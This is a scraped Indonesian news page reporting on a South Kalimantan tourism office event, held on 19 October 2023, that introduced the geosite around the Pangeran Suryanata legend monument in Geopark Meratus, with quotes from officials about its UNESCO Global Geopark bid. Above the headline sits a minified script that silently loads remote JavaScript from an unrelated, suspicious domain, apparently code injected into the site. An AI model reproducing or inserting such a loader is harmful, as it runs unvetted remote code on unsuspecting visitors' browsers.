(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Kawasan Monumen Legenda Pangeran Suryanata, Situs Geopark Meratus di Rute Selatan


KANALKALIMANTAN.COM, BANJARBARU – Salah satu situs geologi Geopark Meratus diperkenalkan kepada khalayak luas.

Kali ini kawasan strategis geosite yang berada di Rute Selatan yakni kawasan sekitar Monumen Legenda Pangeran Suryanata diperkenalkan.

Monumen legenda terletak di Desa Kiram, Kecamatan Karang Intan, Kabupaten Banjar, Kalimantan Selatan (Kalsel).

Baca juga: 12 Jam Pencarian, Bocah 8 Tahun Tenggelam di Sungai Martapura Ditemukan

Dinas Pariwisata (Dispar) Kalsel melakukan sosialisasi geosite dengan menyasar sejumlah masyarakat sebagai bentuk pengembangan sadar wisata dan potensi destinasi wisata di sekitar geosite.

Perwakilan Dispar Kalsel Mugeni menyebutkan, pihaknya ingin meningkatkan pemahaman masyarakat sekitar geosite terhadap UNESCO Global Geopark (UGG).

“Situs Geopark Taman Bumi menjadi bagian pariwisata Kalsel hingga harus terus ditingkatkan sadar wisata bagi masyarakat di sekitar destinasi objek wisata yang memiliki sejarah geologi tersebut,” jelas Mugeni, dalam sosialisasi yang diadakan di Mess L Kota Banjarbaru, Kamis (19/10/2023).

Dirinya menjelaskan, peran serta masyarakat dan Kelompok Sadar Wisata (Pokdarwis) sangat penting agar Geopark Meratus bisa diakui sebagai UGG.

Baca juga: Asimilasi Kerja Sosial Warga Binaan Lapas Kotabaru Dukung Kebersihan Lingkungan

“Mengingat geopark sendiri merupakan salah satu destinasi wisata yang berbasis masyarakat, kita terus memusatkan pelatihan di puluhan titik geosite melalui Pokdarwis,” jelasnya.

Dengan meningkatnya pemahaman masyarakat terhadap Geopark Meratus dan UGG, diharapkan dapat meningkatkan pula persentase Geopark Meratus masuk dalam jajaran UGG.

Pihaknya berharap masyarakat maupun Pokdarwis dapat selalu menjaga kelestarian alam dan budaya yang ada di geosite tersebut.

“Semoga dalam penilaian yang dilakukan oleh UNESCO tahun depan Geopark Meratus mendapatkan hasil yang baik dan bisa masuk dalam jajaran UNESCO Global Geopark,” imbuh Mugeni.

Baca juga: 20 Oktober Hari Osteoporosis Sedunia

Kepala UPTD Taman Hutan Raya (Tahura) Sultan Adam, Ainun Jariah yang menjadi pemateri sosialisasi mengutarakan peningkatan kawasan geosite di sekitar Monumen Legenda Pangeran Suryanata dilakukan dalam meningkatkan peran masyarakat di sekitara geosite khususnya yang berada di rute Selatan dan Timur Geopark Meratus.

“Seperti pemulihan ekosistem dan pemberdayaan masyarakat sekitar Tahura yang masuk dalam geosite rute Selatan dan Timur, itu kita lakukan terus untuk melestarikan hutan,” sebut dia.

Pemberdayaan masyarakat juga tengah dilakukan pihaknya dengan menanam sejumlah tanaman Rehab DAS (Daerah Aliran Sungai) jenis produk hutan bukan kayu di sekitar Tahura Sultan Adam yang diharapkan dapat meningkatkan nilai perekonomian masyarakat sekitar.

“Selain itu kita juga melakukan pengembangan budidaya kopi Aranio yang juga diharapkan meningkatkan kesejahteraan masyarakat, serta menjaga kelestarian Taman Bumi atau geosite Geopark Meratus,” ucapnya.

Baca juga: Mahfud MD Soal Dinasti Politik: Cegah Pakai Apa? Bukan Hukum, Lewat Sanksi Sosial

Senada dengan Mugeni, dirinya berharap Geopark Meratus bisa lolos dalam penilaian yang akan dilakukan oleh Tim UGG tahun depan.

“Dengan keberhasilan itu otomatis menunjang pengembangan wisata di Tahura Sultan Adam, baik yang dikelola oleh pihak Tahura maupun yang dikelola oleh masyarakat,” tukasnya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Empat DPC Ikadin di Kalsel 2023-2026 Dilantik

KANALKALIMANTAN.COM, BANJARMASIN - Ketua Umum Dewan Pimpinan Pusat (DPP) Ikatan Advokat Indonesia (Ikadin), Dr Adardam… Read More

4 jam ago

Andoko Abdi Lamar Partai Sendiri, Putusan Pasangan Ada di DPP

KANALKALIMANTAN.COM, BANJARBARU - Satu kader Partai Demokrat Andoko Abdi menyerahkan berkas pencalonan Pemilihan Wali Kota… Read More

15 jam ago

Bawaslu HSU Melantik 30 Orang Anggota Panwascam

KANALKALIMANTAN.COM, AMUNTAI - Ketua Badan Pengawas Pemilu (Bawaslu) Hulu Sungai Utara (HSU) Marfa'i melantik dan… Read More

16 jam ago

15 Anggota Panwascam Dilantik, Bawaslu Banjarbaru langsung Berikan Bimtek Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilu (Bawaslu) Kota Banjarbaru resmi melantik 15 anggota Panitia Pengawas… Read More

18 jam ago

Pangkalan LPG Diminta Tak Bermain Harga, Polres Banjarmasin Bentuk Tim Khusus

KANALKALIMANTAN.COM, BANJARMASIN - Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin membentuk tim khusus untuk mengatasi permasalaha… Read More

19 jam ago

Langsung Pakai Ihram, Kloter 10 Asal HSU-Banjar-Banjarmasin Terbang ke Tanah Suci

KANALKALIMANTAN.COM, BANJARBARU - Jemaah Haji Kabupaten Hulu Sungai Utara (HSU) yang tergabung dalam Kelompok Terbang… Read More

1 hari ago

This website uses cookies.